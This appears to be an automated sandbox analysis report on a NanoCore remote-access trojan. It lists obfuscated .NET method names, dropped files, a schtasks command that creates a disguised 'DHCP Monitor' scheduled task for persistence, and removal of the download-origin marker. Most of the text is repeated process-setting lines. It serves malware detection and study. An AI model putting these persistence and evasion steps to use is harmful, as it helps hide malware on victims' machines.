      Source: 2.2.nanocore.exe.4a90000.8.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 2.2.nanocore.exe.4a90000.8.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: 10.2.nanocore.exe.49c0000.9.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: 10.2.nanocore.exe.49c0000.9.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: 11.2.dhcpmon.exe.4920000.9.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 13.2.dhcpmon.exe.4fa0000.9.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
      Source: 13.2.dhcpmon.exe.4fa0000.9.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeFile created: C:\Users\user\AppData\Local\Temp\nse444B.tmp\4rmzuajr4dtt.dllJump to dropped file
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeFile created: C:\Users\user\AppData\Local\Temp\nsq6D11.tmp\4rmzuajr4dtt.dllJump to dropped file
      Source: C:\Users\user\Desktop\nanocore.exeFile created: C:\Users\user\AppData\Local\Temp\nsn2692.tmp\4rmzuajr4dtt.dllJump to dropped file
      Source: C:\Users\user\Desktop\nanocore.exeFile created: C:\Users\user\AppData\Local\Temp\nsj42E4.tmp\4rmzuajr4dtt.dllJump to dropped file
      Source: C:\Users\user\Desktop\nanocore.exeFile created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeJump to dropped file

      Boot Survival:

      barindex
      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
      Source: C:\Users\user\Desktop\nanocore.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp38C1.tmp'

      Hooking and other Techniques for Hiding and Protection:

      barindex
      Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
      Source: C:\Users\user\Desktop\nanocore.exeFile opened: C:\Users\user\Desktop\nanocore.exe:Zone.Identifier read attributes | deleteJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nanocore.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
